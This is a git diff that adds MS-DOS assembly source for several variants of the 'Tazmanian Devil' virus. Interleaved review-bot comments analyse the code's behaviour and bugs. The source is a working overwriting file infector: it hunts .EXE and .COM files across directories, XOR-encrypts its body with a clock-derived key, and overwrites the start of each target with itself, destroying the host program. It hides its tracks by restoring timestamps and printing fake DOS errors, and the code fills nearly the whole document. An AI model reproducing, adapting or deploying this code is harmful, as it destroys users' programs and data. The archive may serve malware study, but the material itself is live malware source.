@@ -0,0 +1,278 @@ +cr equ 13 ; This VIRUS was written 12-14-1992 +lf equ 10 ; AND QUIT READING MY SOURCE CODE +tab equ 9 ; YOU SHITHEAD FUCKNOSE DOUCHE BAG +virus_size equ 1973 ; QUEERBAIT VIRUS TRACKER WANNA-BE! +code_start equ 100h ; Address right after PSP in memory +dta equ 80h ; Addr of default disk transfer area +datestamp equ 24 ; Offset in DTA of file's date stamp +timestamp equ 22 ; Offset in DTA of file's time stamp +filename equ 30 ; Offset in DTA of ASCIIZ filename +attribute equ 21 ; Offset in DTA of file attribute + + + code segment 'code' ; Open code segment + assume cs:code,ds:code ; One segment for both code & data + org code_start ; Start code image after PSP + +;--------------------------------------------------------------------- +; All executable code is contained in boundaries of procedure "main". +; The following code, until the start of "virus_code", is the non- +; encrypted CMT portion of the code to load up the real program. +;--------------------------------------------------------------------- +main proc near ; Code execution begins here + call encrypt_decrypt ; Decrypt the real virus code + jmp random_mutation ; Put the virus into action + +encrypt_val db 00h ; Hold value to encrypt by here + +; ---------- Encrypt, save, and restore the virus code ----------- +infect_file: + mov bx,handle ; Get the handle + push bx ; Save it on the stack + call encrypt_decrypt ; Encrypt most of the code + pop bx ; Get back the handle + mov cx,virus_size ; Total number of bytes to write + mov dx,code_start ; Buffer where code starts in memory + mov ah,40h ; DOS write-to-handle service + int 21h ; Write the virus code into the file + call encrypt_decrypt ; Restore the code as it was + ret ; Go back to where you came from + +; --------------- Encrypt or decrypt the virus code ---------------- +encrypt_decrypt: + mov bx,offset virus_code ; Get address to start encrypt/decrypt +xor_loop: ; Start cycle here + mov ah,[bx] ; Get the current byte + xor 
ah,encrypt_val ; Engage/disengage XOR scheme on it + mov [bx],ah ; Put it back where we got it + inc bx ; Move BX ahead a byte + cmp bx,offset virus_code+virus_size ; Are we at the end? + jle xor_loop ; If not, do another cycle + ret ; and go back where we came from + +;----------------------------------------------------------------------- +; The rest of the code from here on remains encrypted until run-time, +; using a fundamental XOR technique that changes via CMT. +;----------------------------------------------------------------------- +virus_code: + +;---------------------------------------------------------------------------- +; All strings are kept here in the file, and automatically encrypted. +; Please don't be a lamer and change the strings and say you wrote a virus. +; Because of Cybernetic Mutation Technology(tm), the CRC of this file often +; changes, even when the strings stay the same. +;---------------------------------------------------------------------------- +exe_filespec db "*.EXE",0 +com_filespec db "*.COM",0 +newdir db "..",0 +fake_msg db cr,lf,"Bad command or filename$" +virus_msg1 db cr,lf," $" +virus_msg2 db cr,lf," $" +virus_msg3 db cr,lf," $" +virus_msg4 db cr,lf," $" +virus_msg5 db cr,lf," $" +virus_msg6 db cr,lf," $" +virus_msg7 db cr,lf," $" +virus_msg8 db cr,lf," $" +virus_msg9 db cr,lf," $" +virus_msg10 db cr,lf," $" +virus_msg11 db cr,lf," $" +virus_msg12 db cr,lf," $" +virus_msg13 db cr,lf," $" +virus_msg14 db cr,lf," $" +virus_msg15 db cr,lf," $" +virus_msg16 db cr,lf," $" +virus_msg17 db cr,lf," $" +virus_msg18 db cr,lf," $" +virus_msg19 db cr,lf," $" +virus_msg20 db cr,lf," $" +virus_msg21 db cr,lf," $" +virus_msg22 db cr,lf," $" +virus_msg23 db cr,lf," $" +compare_buf db 20 dup (?) ; Buffer to compare files in +files_found db ? +files_infected db ? +orig_time dw ? +orig_date dw ? +orig_attr dw ? +handle dw ? +success db ? 
+ +random_mutation: ; First decide if virus is to mutate + mov ah,2ch ; Set up DOS function to get time + int 21h + cmp encrypt_val,0 ; Is this a first-run virus copy? + je install_val ; If so, install whatever you get. + cmp dh,15 ; Is it less than 16 seconds? + jg find_extension ; If not, don't mutate this time +install_val: + cmp dl,0 ; Will we be encrypting using zero? + je random_mutation ; If so, get a new value. + mov encrypt_val,dl ; Otherwise, save the new value +find_extension: ; Locate file w/ valid extension + mov files_found,0 ; Count infected files found + mov files_infected,10 ; BX counts file infected so far + mov success,0 +find_exe: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset exe_filespec ; Check for .EXE extension first + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? + je find_com ; If not, nothing more to do + call find_healthy ; Otherwise, try to find healthy .EXE +find_com: + mov cx,00100111b ; Look for all flat file attributes + mov dx,offset com_filespec ; Check for .COM extension now + mov ah,4eh ; Call DOS find first service + int 21h + cmp ax,12h ; Are no files found? 
+ je chdir ; If not, step back a directory + call find_healthy ; Otherwise, try to find healthy .COM +chdir: ; Routine to step back one level + mov dx,offset newdir ; Load DX with address of pathname + mov ah,3bh ; Change directory DOS service + int 21h + dec files_infected ; This counts as infecting a file + jnz find_exe ; If we're still rolling, find another + jmp exit_virus ; Otherwise let's pack it up +find_healthy: + mov bx,dta ; Point BX to address of DTA + mov ax,[bx]+attribute ; Get the current file's attribute + mov orig_attr,ax ; Save it + mov ax,[bx]+timestamp ; Get the current file's time stamp + mov orig_time,ax ; Save it + mov ax,[bx]+datestamp ; Get the current file's data stamp + mov orig_date,ax ; Save it + mov dx,dta+filename ; Get the filename to change attribute + mov cx,0 ; Clear all attribute bytes + mov al,1 ; Set attribute sub-function + mov ah,43h ; Call DOS service to do it + int 21h + mov al,2 ; Set up to open handle for read/write + mov ah,3dh ; Open file handle DOS service + int 21h + mov handle,ax ; Save the file handle + mov bx,ax ; Transfer the handle to BX for read + mov cx,20 ; Read in the top 20 bytes of file + mov dx,offset compare_buf ; Use the small buffer up top + mov ah,3fh ; DOS read-from-handle service + int 21h + mov bx,offset compare_buf ; Adjust the encryption value + mov ah,encrypt_val ; for accurate comparison + mov [bx+6],ah + mov si,code_start ; One array to compare is this file + mov di,offset compare_buf ; The other array is the buffer + mov ax,ds ; Transfer the DS register... + mov es,ax ; ...to the ES register + cld + repe cmpsb ; Compare the buffer to the virus + jne healthy ; If different, the file is healthy! + call close_file ; Close it up otherwise + inc files_found ; Chalk up another fucked up file +continue_search: + mov ah,4fh ; Find next DOS function + int 21h ; Try to find another same type file + cmp ax,12h ; Are there any more files? 
+ je no_more_found ; If not, get outta here + jmp find_healthy ; If so, try the process on this one! +no_more_found: + ret ; Go back to where we came from +healthy: + mov bx,handle ; Get the file handle + mov ah,3eh ; Close it for now + int 21h + mov ah,3dh ; Open it again, to reset it + mov dx,dta+filename + mov al,2 + int 21h + mov handle,ax ; Save the handle again + call infect_file ; Infect the healthy file + call close_file ; Close down this operation + inc success ; Indicate we did something this time + dec files_infected ; Scratch off another file on agenda + jz exit_virus ; If we're through, terminate + jmp continue_search ; Otherwise, try another + ret +close_file: + mov bx,handle ; Get the file handle off the stack + mov cx,orig_time ; Get the date stamp + mov dx,orig_date ; Get the time stamp + mov al,1 ; Set file date/time sub-service + mov ah,57h ; Get/Set file date and time service + int 21h ; Call DOS + mov bx,handle + mov ah,3eh ; Close handle DOS service + int 21h + mov cx,orig_attr ; Get the file's original attribute + mov al,1 ; Instruct DOS to put it back there + mov dx,dta+filename ; Feed it the filename + mov ah,43h ; Call DOS + int 21h + ret +exit_virus: + cmp files_found,5 ; Are at least 5 files infected? + jl print_fake ; If not, keep a low profile + cmp success,0 ; Did we infect anything? 
+ jg print_fake ; If so, cover it up + mov ah,09h ; Use DOS print string service + mov dx,offset virus_msg1 ; Load the address of the first line + int 21h ; Print it + mov dx,offset virus_msg2 ; Load the second line + int 21h ; (etc) + mov dx,offset virus_msg3 + int 21h + mov dx,offset virus_msg4 + int 21h + mov dx,offset virus_msg5 + int 21h + mov dx,offset virus_msg6 + int 21h + mov dx,offset virus_msg7 + int 21h + mov dx,offset virus_msg8 + int 21h + mov dx,offset virus_msg9 + int 21h + mov dx,offset virus_msg10 + int 21h + mov dx,offset virus_msg11 + int 21h + mov dx,offset virus_msg12 + int 21h + mov dx,offset virus_msg13 + int 21h + mov dx,offset virus_msg14 + int 21h + mov dx,offset virus_msg15 + int 21h + mov dx,offset virus_msg16 + int 21h + mov dx,offset virus_msg17 + int 21h + mov dx,offset virus_msg18 + int 21h + mov dx,offset virus_msg19 + int 21h + mov dx,offset virus_msg20 + int 21h + mov dx,offset virus_msg21 + int 21h + mov dx,offset virus_msg22 + int 21h + mov dx,offset virus_msg23 + int 21h + jmp terminate +print_fake: + mov ah,09h ; Use DOS to print fake error message + mov dx,offset fake_msg + int 21h +terminate: + mov ah,4ch ; DOS terminate process function + int 21h ; Call DOS to get out of this program + +; filler db 8 dup (90h) ; Pad out the file length to 666 bytes + +main endp +code ends + end main diff --git a/MSDOS/Virus.MSDOS.Unknown.taz-2197.asm b/MSDOS/Virus.MSDOS.Unknown.taz-2197.asm new file mode 100644 index 00000000..43533b00 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.taz-2197.asm 
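Review bot: The hunk carries no description of the sample, and the code is not a parasitic infector: `healthy:` closes and reopens the target, then `infect_file` writes `virus_size` bytes from `code_start` at file offset 0 with no seek to the end and no copy of the host's original bytes, so each "infected" file is overwritten and afterwards only prints `fake_msg` before `terminate`. A header comment would spare the next analyst the read-through: `; Overwriting COM/EXE infector: replaces the first 1973 bytes of each target with itself (host not preserved); body XOR-encrypted with a key from the DOS clock hundredths field, re-keyed when seconds <= 15; climbs the directory tree via ".." until a shared budget of 10 infections/steps is spent; prints "Bad command or filename" as cover.` Two smaller defects: `find_healthy` fetches the attribute with a word move (`mov ax,[bx]+attribute`), so `orig_attr` and the CX later handed to 4301h carry the low byte of the DTA time field in CH, which DOS may reject when the attribute is restored; and `find_exe`, `find_com` and `continue_search` test AX for 12h instead of CF, so an undefined AX on success or a 03h path error is mis-classified.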
@@ -0,0 +1,276 @@
+cr equ 13 ; Carriage return ASCII code
+lf equ 10 ; Linefeed ASCII code
+tab equ 9 ; Tab ASCII code
+virus_size equ 2197 ; Size of the virus file
+code_start equ 100h ; Address right after PSP in memory
+dta equ 80h ; Addr of default disk transfer area
+datestamp equ 24 ; Offset in DTA of file's date stamp
+timestamp equ 22 ; Offset in DTA of file's time stamp
+filename equ 30 ; Offset in DTA of ASCIIZ filename
+attribute equ 21 ; Offset in DTA of file attribute
+
+
+ code segment 'code' ; Open code segment
+ assume cs:code,ds:code ; One segment for both code & data
+ org code_start ; Start code image after PSP
+
+;---------------------------------------------------------------------
+; All executable code is contained in boundaries of procedure "main".
+; The following code, until the start of "virus_code", is the non-
+; encrypted CMT portion of the code to load up the real program.
+;---------------------------------------------------------------------
+main proc near ; Code execution begins here
+ call encrypt_decrypt ; Decrypt the real virus code
+ jmp random_mutation ; Put the virus into action
+
+encrypt_val db 00h ; Hold value to encrypt by here
+
+; ---------- Encrypt, save, and restore the virus code -----------
+infect_file:
+ mov bx,handle ; Get the handle
+ push bx ; Save it on the stack
+ call encrypt_decrypt ; Encrypt most of the code
+ pop bx ; Get back the handle
+ mov cx,virus_size ; Total number of bytes to write
+ mov dx,code_start ; Buffer where code starts in memory
+ mov ah,40h ; DOS write-to-handle service
+ int 21h ; Write the virus code into the file
+ call encrypt_decrypt ; Restore the code as it was
+ ret ; Go back to where you came from
+
+; --------------- Encrypt or decrypt the virus code ----------------
+encrypt_decrypt:
+ mov bx,offset virus_code ; Get address to start encrypt/decrypt
+xor_loop: ; Start cycle here
+ mov ah,[bx] ; Get the current byte
+ xor ah,encrypt_val ; Engage/disengage XOR scheme on it
+ mov [bx],ah ; Put it back where we got it
+ inc bx ; Move BX ahead a byte
+ cmp bx,offset virus_code+virus_size ; Are we at the end?
+ jle xor_loop ; If not, do another cycle
+ ret ; and go back where we came from
+
+;-----------------------------------------------------------------------
+; The rest of the code from here on remains encrypted until run-time,
+; using a fundamental XOR technique that changes via CMT.
+;-----------------------------------------------------------------------
+virus_code:
+
+;----------------------------------------------------------------------------
+; All strings are kept here in the file, and automatically encrypted.
+; Please don't be a lamer and change the strings and say you wrote a virus.
+; Because of Cybernetic Mutation Technology(tm), the CRC of this file often
+; changes, even when the strings stay the same.
+;----------------------------------------------------------------------------
+exe_filespec db "*.EXE",0
+com_filespec db "*.COM",0
+newdir db "..",0
+fake_msg db cr,lf,"Program too big to fit in memory$"
+virus_msg1 db cr," $"
+virus_msg2 db cr," $"
+virus_msg3 db cr," $"
+virus_msg4 db cr," $"
+virus_msg5 db cr," $"
+virus_msg6 db cr," $"
+virus_msg7 db cr," $"
+virus_msg8 db cr," $"
+virus_msg9 db cr," $"
+virus_msg10 db cr," $"
+virus_msg11 db cr," $"
+virus_msg12 db cr," $"
+virus_msg13 db cr," $"
+virus_msg14 db cr," $"
+virus_msg15 db cr," $"
+virus_msg16 db cr," $"
+virus_msg17 db cr," $"
+virus_msg18 db cr," $"
+virus_msg19 db cr," $"
+virus_msg20 db cr," $"
+virus_msg21 db cr," $"
+virus_msg22 db cr,"The Tazmanian Devil Virus (TAZ!) - Released 12-14-1992 - Sector Infector $"
+compare_buf db 20 dup (?) ; Buffer to compare files in
+files_found db ?
+files_infected db ?
+orig_time dw ?
+orig_date dw ?
+orig_attr dw ?
+handle dw ?
+success db ?
+
+random_mutation: ; First decide if virus is to mutate
+ mov ah,2ch ; Set up DOS function to get time
+ int 21h
+ cmp encrypt_val,0 ; Is this a first-run virus copy?
+ je install_val ; If so, install whatever you get.
+ cmp dh,15 ; Is it less than 16 seconds?
+ jg find_extension ; If not, don't mutate this time
+install_val:
+ cmp dl,0 ; Will we be encrypting using zero?
+ je random_mutation ; If so, get a new value.
+ mov encrypt_val,dl ; Otherwise, save the new value
+find_extension: ; Locate file w/ valid extension
+ mov files_found,0 ; Count infected files found
+ mov files_infected,4 ; BX counts file infected so far
+ mov success,0
+find_exe:
+ mov cx,00100111b ; Look for all flat file attributes
+ mov dx,offset exe_filespec ; Check for .EXE extension first
+ mov ah,4eh ; Call DOS find first service
+ int 21h
+ cmp ax,12h ; Are no files found?
+ je find_com ; If not, nothing more to do
+ call find_healthy ; Otherwise, try to find healthy .EXE
+find_com:
+ mov cx,00100111b ; Look for all flat file attributes
+ mov dx,offset com_filespec ; Check for .COM extension now
+ mov ah,4eh ; Call DOS find first service
+ int 21h
+ cmp ax,12h ; Are no files found?
+ je chdir ; If not, step back a directory
+ call find_healthy ; Otherwise, try to find healthy .COM
+chdir: ; Routine to step back one level
+ mov dx,offset newdir ; Load DX with address of pathname
+ mov ah,3bh ; Change directory DOS service
+ int 21h
+ dec files_infected ; This counts as infecting a file
+ jnz find_exe ; If we're still rolling, find another
+ jmp exit_virus ; Otherwise let's pack it up
+find_healthy:
+ mov bx,dta ; Point BX to address of DTA
+ mov ax,[bx]+attribute ; Get the current file's attribute
+ mov orig_attr,ax ; Save it
+ mov ax,[bx]+timestamp ; Get the current file's time stamp
+ mov orig_time,ax ; Save it
+ mov ax,[bx]+datestamp ; Get the current file's data stamp
+ mov orig_date,ax ; Save it
+ mov dx,dta+filename ; Get the filename to change attribute
+ mov cx,0 ; Clear all attribute bytes
+ mov al,1 ; Set attribute sub-function
+ mov ah,43h ; Call DOS service to do it
+ int 21h
+ mov al,2 ; Set up to open handle for read/write
+ mov ah,3dh ; Open file handle DOS service
+ int 21h
+ mov handle,ax ; Save the file handle
+ mov bx,ax ; Transfer the handle to BX for read
+ mov cx,20 ; Read in the top 20 bytes of file
+ mov dx,offset compare_buf ; Use the small buffer up top
+ mov ah,3fh ; DOS read-from-handle service
+ int 21h
+ mov bx,offset compare_buf ; Adjust the encryption value
+ mov ah,encrypt_val ; for accurate comparison
+ mov [bx+6],ah
+ mov si,code_start ; One array to compare is this file
+ mov di,offset compare_buf ; The other array is the buffer
+ mov ax,ds ; Transfer the DS register...
+ mov es,ax ; ...to the ES register
+ cld
+ repe cmpsb ; Compare the buffer to the virus
+ jne healthy ; If different, the file is healthy!
+ call close_file ; Close it up otherwise
+ inc files_found ; Chalk up another fucked up file
+continue_search:
+ mov ah,4fh ; Find next DOS function
+ int 21h ; Try to find another same type file
+ cmp ax,12h ; Are there any more files?
+ je no_more_found ; If not, get outta here
+ jmp find_healthy ; If so, try the process on this one!
+no_more_found:
+ ret ; Go back to where we came from
+healthy:
+ mov bx,handle ; Get the file handle
+ mov ah,3eh ; Close it for now
+ int 21h
+ mov ah,3dh ; Open it again, to reset it
+ mov dx,dta+filename
+ mov al,2
+ int 21h
+ mov handle,ax ; Save the handle again
+ call infect_file ; Infect the healthy file
+ call close_file ; Close down this operation
+ inc success ; Indicate we did something this time
+ dec files_infected ; Scratch off another file on agenda
+ jz exit_virus ; If we're through, terminate
+ jmp continue_search ; Otherwise, try another
+ ret
+close_file:
+ mov bx,handle ; Get the file handle off the stack
+ mov cx,orig_time ; Get the date stamp
+ mov dx,orig_date ; Get the time stamp
+ mov al,1 ; Set file date/time sub-service
+ mov ah,57h ; Get/Set file date and time service
+ int 21h ; Call DOS
+ mov bx,handle
+ mov ah,3eh ; Close handle DOS service
+ int 21h
+ mov cx,orig_attr ; Get the file's original attribute
+ mov al,1 ; Instruct DOS to put it back there
+ mov dx,dta+filename ; Feed it the filename
+ mov ah,43h ; Call DOS
+ int 21h
+ ret
+exit_virus:
+ cmp files_found,6 ; Are at least 6 files infected?
+ jl print_fake ; If not, keep a low profile
+ cmp success,0 ; Did we infect anything?
+ jg print_fake ; If so, cover it up
+ mov ah,09h ; Use DOS print string service
+ mov dx,offset virus_msg1 ; Load the address of the first line
+ int 21h ; Print it
+ mov dx,offset virus_msg2 ; Load the second line
+ int 21h ; (etc)
+ mov dx,offset virus_msg3
+ int 21h
+ mov dx,offset virus_msg4
+ int 21h
+ mov dx,offset virus_msg5
+ int 21h
+ mov dx,offset virus_msg6
+ int 21h
+ mov dx,offset virus_msg7
+ int 21h
+ mov dx,offset virus_msg8
+ int 21h
+ mov dx,offset virus_msg9
+ int 21h
+ mov dx,offset virus_msg10
+ int 21h
+ mov dx,offset virus_msg11
+ int 21h
+ mov dx,offset virus_msg12
+ int 21h
+ mov dx,offset virus_msg13
+ int 21h
+ mov dx,offset virus_msg14
+ int 21h
+ mov dx,offset virus_msg15
+ int 21h
+ mov dx,offset virus_msg16
+ int 21h
+ mov dx,offset virus_msg17
+ int 21h
+ mov dx,offset virus_msg18
+ int 21h
+ mov dx,offset virus_msg19
+ int 21h
+ mov dx,offset virus_msg20
+ int 21h
+ mov dx,offset virus_msg21
+ int 21h
+ mov dx,offset virus_msg22
+ int 21h
+
+ jmp terminate
+print_fake:
+ mov ah,09h ; Use DOS to print fake error message
+ mov dx,offset fake_msg
+ int 21h
+terminate:
+ mov ah,4ch ; DOS terminate process function
+ int 21h ; Call DOS to get out of this program
+
+filler db 8 dup (90h) ; Pad out the file length to 666 bytes
+
+main endp
+code ends
+ end main
diff --git a/MSDOS/Virus.MSDOS.Unknown.taz-2208.asm b/MSDOS/Virus.MSDOS.Unknown.taz-2208.asm
new file mode 100644
index 00000000..cb25df2e
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.taz-2208.asm
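Review bot: Several comments in this hunk describe something other than the instruction beside them: in `close_file`, `mov cx,orig_time ; Get the date stamp` and `mov dx,orig_date ; Get the time stamp` have the words swapped (INT 21h function 57h takes the time in CX and the date in DX, which is what the data labels supply), `mov files_infected,4 ; BX counts file infected so far` names a register the counter never uses, and `filler db 8 dup (90h) ; Pad out the file length to 666 bytes` sits in a file declaring `virus_size equ 2197`. The same three comments recur unchanged in the taz-2208, taz-2209 and taz-2276 hunks below. Suggested wording: `; Get the time stamp` / `; Get the date stamp` on the two close_file lines, and drop the register reference and the byte count from the other two.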
@@ -0,0 +1,240 @@
+cr equ 13 ; Carriage return ASCII code
+lf equ 10 ; Linefeed ASCII code
+tab equ 9 ; Tab ASCII code
+virus_size equ 562 ; Size of the virus file
+code_start equ 100h ; Address right after PSP in memory
+dta equ 80h ; Addr of default disk transfer area
+datestamp equ 24 ; Offset in DTA of file's date stamp
+timestamp equ 22 ; Offset in DTA of file's time stamp
+filename equ 30 ; Offset in DTA of ASCIIZ filename
+attribute equ 21 ; Offset in DTA of file attribute
+
+
+ code segment 'code' ; Open code segment
+ assume cs:code,ds:code ; One segment for both code & data
+ org code_start ; Start code image after PSP
+
+main proc near ; Code execution begins here
+ jmp random_mutation ; Put the virus into action
+
+encrypt_val db 00h ; Hold value to encrypt by here
+
+infect_file:
+ mov bx,handle ; Get the handle
+ push bx ; Save it on the stack
+ pop bx ; Get back the handle
+ mov cx,virus_size ; Total number of bytes to write
+ mov dx,code_start ; Buffer where code starts in memory
+ mov ah,40h ; DOS write-to-handle service
+ int 21h ; Write the virus code into the file
+ ret ; Go back to where you came from
+
+
+virus_code:
+exe_filespec db "*.EXE",0
+com_filespec db "*.COM",0
+newdir db "..",0
+fake_msg db cr,lf,"Error #2307 - Too big to fit in memory$"
+virus_msg1 db cr,lf,tab," $"
+virus_msg2 db cr,lf,tab," $"
+virus_msg3 db cr,lf,tab," $"
+virus_msg4 db cr,lf,tab," $"
+virus_msg5 db cr,lf,tab," $"
+virus_msg6 db cr,lf,tab," $"
+virus_msg7 db cr,lf,tab," $"
+virus_msg8 db cr,lf,tab," $"
+virus_msg9 db cr,lf,tab," $"
+virus_msg10 db cr,lf,tab," $"
+virus_msg11 db cr,lf,tab," $"
+virus_msg12 db cr,lf,tab," $"
+virus_msg13 db cr,lf,tab," $"
+virus_msg14 db cr,lf,tab," $"
+virus_msg15 db cr,lf,tab," $"
+virus_msg16 db cr,lf,tab," $"
+virus_msg17 db cr,lf,tab," $"
+virus_msg18 db cr,lf,tab," $"
+virus_msg19 db cr,lf,tab," $"
+virus_msg20 db cr,lf,tab," $"
+virus_msg21 db cr,lf,tab," $"
+virus_msg22 db cr,lf,tab,"The Tazmanian Devil Virus (TAZ!) - Released 12-14-1992 - Sector Infector $"
+compare_buf db 20 dup (?) ; Buffer to compare files in
+files_found db ?
+files_infected db ?
+orig_time dw ?
+orig_date dw ?
+orig_attr dw ?
+handle dw ?
+success db ?
+
+random_mutation: ; First decide if virus is to mutate
+ mov ah,2ch ; Set up DOS function to get time
+ int 21h
+ cmp encrypt_val,0 ; Is this a first-run virus copy?
+ je install_val ; If so, install whatever you get.
+ cmp dh,15 ; Is it less than 16 seconds?
+ jg find_extension ; If not, don't mutate this time
+install_val:
+ cmp dl,0 ; Will we be encrypting using zero?
+ je random_mutation ; If so, get a new value.
+ mov encrypt_val,dl ; Otherwise, save the new value
+find_extension: ; Locate file w/ valid extension
+ mov files_found,0 ; Count infected files found
+ mov files_infected,4 ; BX counts file infected so far
+ mov success,0
+find_exe:
+ mov cx,00100111b ; Look for all flat file attributes
+ mov dx,offset exe_filespec ; Check for .EXE extension first
+ mov ah,4eh ; Call DOS find first service
+ int 21h
+ cmp ax,12h ; Are no files found?
+ je find_com ; If not, nothing more to do
+ call find_healthy ; Otherwise, try to find healthy .EXE
+find_com:
+ mov cx,00100111b ; Look for all flat file attributes
+ mov dx,offset com_filespec ; Check for .COM extension now
+ mov ah,4eh ; Call DOS find first service
+ int 21h
+ cmp ax,12h ; Are no files found?
+ je chdir ; If not, step back a directory
+ call find_healthy ; Otherwise, try to find healthy .COM
+chdir: ; Routine to step back one level
+ mov dx,offset newdir ; Load DX with address of pathname
+ mov ah,3bh ; Change directory DOS service
+ int 21h
+ dec files_infected ; This counts as infecting a file
+ jnz find_exe ; If we're still rolling, find another
+ jmp exit_virus ; Otherwise let's pack it up
+find_healthy:
+ mov bx,dta ; Point BX to address of DTA
+ mov ax,[bx]+attribute ; Get the current file's attribute
+ mov orig_attr,ax ; Save it
+ mov ax,[bx]+timestamp ; Get the current file's time stamp
+ mov orig_time,ax ; Save it
+ mov ax,[bx]+datestamp ; Get the current file's data stamp
+ mov orig_date,ax ; Save it
+ mov dx,dta+filename ; Get the filename to change attribute
+ mov cx,0 ; Clear all attribute bytes
+ mov al,1 ; Set attribute sub-function
+ mov ah,43h ; Call DOS service to do it
+ int 21h
+ mov al,2 ; Set up to open handle for read/write
+ mov ah,3dh ; Open file handle DOS service
+ int 21h
+ mov handle,ax ; Save the file handle
+ mov bx,ax ; Transfer the handle to BX for read
+ mov cx,20 ; Read in the top 20 bytes of file
+ mov dx,offset compare_buf ; Use the small buffer up top
+ mov ah,3fh ; DOS read-from-handle service
+ int 21h
+ mov bx,offset compare_buf ; Adjust the encryption value
+ mov ah,encrypt_val ; for accurate comparison
+ mov [bx+6],ah
+ mov si,code_start ; One array to compare is this file
+ mov di,offset compare_buf ; The other array is the buffer
+ mov ax,ds ; Transfer the DS register...
+ mov es,ax ; ...to the ES register
+ cld
+ repe cmpsb ; Compare the buffer to the virus
+ jne healthy ; If different, the file is healthy!
+ call close_file ; Close it up otherwise
+ inc files_found ; Chalk up another fucked up file
+continue_search:
+ mov ah,4fh ; Find next DOS function
+ int 21h ; Try to find another same type file
+ cmp ax,12h ; Are there any more files?
+ je no_more_found ; If not, get outta here
+ jmp find_healthy ; If so, try the process on this one!
+no_more_found:
+ ret ; Go back to where we came from
+healthy:
+ mov bx,handle ; Get the file handle
+ mov ah,3eh ; Close it for now
+ int 21h
+ mov ah,3dh ; Open it again, to reset it
+ mov dx,dta+filename
+ mov al,2
+ int 21h
+ mov handle,ax ; Save the handle again
+ call infect_file ; Infect the healthy file
+ call close_file ; Close down this operation
+ inc success ; Indicate we did something this time
+ dec files_infected ; Scratch off another file on agenda
+ jz exit_virus ; If we're through, terminate
+ jmp continue_search ; Otherwise, try another
+ ret
+close_file:
+ mov bx,handle ; Get the file handle off the stack
+ mov cx,orig_time ; Get the date stamp
+ mov dx,orig_date ; Get the time stamp
+ mov al,1 ; Set file date/time sub-service
+ mov ah,57h ; Get/Set file date and time service
+ int 21h ; Call DOS
+ mov bx,handle
+ mov ah,3eh ; Close handle DOS service
+ int 21h
+ mov cx,orig_attr ; Get the file's original attribute
+ mov al,1 ; Instruct DOS to put it back there
+ mov dx,dta+filename ; Feed it the filename
+ mov ah,43h ; Call DOS
+ int 21h
+ ret
+exit_virus:
+ cmp files_found,16 ; Are at least 16 files infected?
+ jl print_fake ; If not, keep a low profile
+ cmp success,0 ; Did we infect anything?
+ jg print_fake ; If so, cover it up
+ mov ah,09h ; Use DOS print string service
+ mov dx,offset virus_msg1 ; Load the address of the first line
+ int 21h ; Print it
+ mov dx,offset virus_msg2 ; Load the second line
+ int 21h ; (etc)
+ mov dx,offset virus_msg3
+ int 21h
+ mov dx,offset virus_msg4
+ int 21h
+ mov dx,offset virus_msg5
+ int 21h
+ mov dx,offset virus_msg6
+ int 21h
+ mov dx,offset virus_msg7
+ int 21h
+ mov dx,offset virus_msg8
+ int 21h
+ mov dx,offset virus_msg9
+ int 21h
+ mov dx,offset virus_msg10
+ int 21h
+ mov dx,offset virus_msg11
+ int 21h
+ mov dx,offset virus_msg12
+ int 21h
+ mov dx,offset virus_msg13
+ int 21h
+ mov dx,offset virus_msg14
+ int 21h
+ mov dx,offset virus_msg15
+ int 21h
+ mov dx,offset virus_msg16
+ int 21h
+ mov dx,offset virus_msg17
+ int 21h
+ mov dx,offset virus_msg18
+ int 21h
+ mov dx,offset virus_msg19
+ int 21h
+ mov dx,offset virus_msg20
+ int 21h
+jmp terminate
+print_fake:
+ mov ah,09h ; Use DOS to print fake error message
+ mov dx,offset fake_msg
+ int 21h
+terminate:
+ mov ah,4ch ; DOS terminate process function
+ int 21h ; Call DOS to get out of this program
+
+filler db 8 dup (90h) ; Pad out the file length to 666 bytes
+
+main endp
+code ends
+ end main
diff --git a/MSDOS/Virus.MSDOS.Unknown.taz-2209.asm b/MSDOS/Virus.MSDOS.Unknown.taz-2209.asm
new file mode 100644
index 00000000..65d6b07a
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.taz-2209.asm
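Review bot: The comments in this variant still describe the encrypted siblings: `encrypt_decrypt` is gone and `infect_file` writes the image from `code_start` verbatim, yet `random_mutation: ; First decide if virus is to mutate`, the `encrypt_val` bookkeeping (`cmp encrypt_val,0`, `mov encrypt_val,dl`) and the `mov [bx+6],ah ; Adjust the encryption value` patch in `find_healthy` are retained, so a reader is led to look for encryption that is not there. The empty `push bx` / `pop bx` pair in `infect_file` is a leftover of the removed `call encrypt_decrypt` between them. The taz-2209 hunk below has the same leftovers. A one-line note above `random_mutation`, e.g. `; NOTE: this variant has no encrypt/decrypt step; encrypt_val is vestigial`, would be enough for archival purposes.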
@@ -0,0 +1,238 @@
+cr equ 13 ; Carriage return ASCII code
+lf equ 10 ; Linefeed ASCII code
+tab equ 9 ; Tab ASCII code
+virus_size equ 2209 ; Size of the virus file
+code_start equ 100h ; Address right after PSP in memory
+dta equ 80h ; Addr of default disk transfer area
+datestamp equ 24 ; Offset in DTA of file's date stamp
+timestamp equ 22 ; Offset in DTA of file's time stamp
+filename equ 30 ; Offset in DTA of ASCIIZ filename
+attribute equ 21 ; Offset in DTA of file attribute
+
+
+ code segment 'code' ; Open code segment
+ assume cs:code,ds:code ; One segment for both code & data
+ org code_start ; Start code image after PSP
+
+main proc near ; Code execution begins here
+ jmp random_mutation ; Put the virus into action
+
+encrypt_val db 00h ; Hold value to encrypt by here
+
+infect_file:
+ mov bx,handle ; Get the handle
+ push bx ; Save it on the stack
+ pop bx ; Get back the handle
+ mov cx,virus_size ; Total number of bytes to write
+ mov dx,code_start ; Buffer where code starts in memory
+ mov ah,40h ; DOS write-to-handle service
+ int 21h ; Write the virus code into the file
+ ret ; Go back to where you came from
+
+
+virus_code:
+exe_filespec db "*.EXE",0
+com_filespec db "*.COM",0
+newdir db "..",0
+fake_msg db cr,lf,"Error #2307 - Too big to fit in memory$"
+virus_msg1 db cr,lf,tab," $"
+virus_msg2 db cr,lf,tab," $"
+virus_msg3 db cr,lf,tab," $"
+virus_msg4 db cr,lf,tab," $"
+virus_msg5 db cr,lf,tab," $"
+virus_msg6 db cr,lf,tab," $"
+virus_msg7 db cr,lf,tab," $"
+virus_msg8 db cr,lf,tab," $"
+virus_msg9 db cr,lf,tab," $"
+virus_msg10 db cr,lf,tab," $"
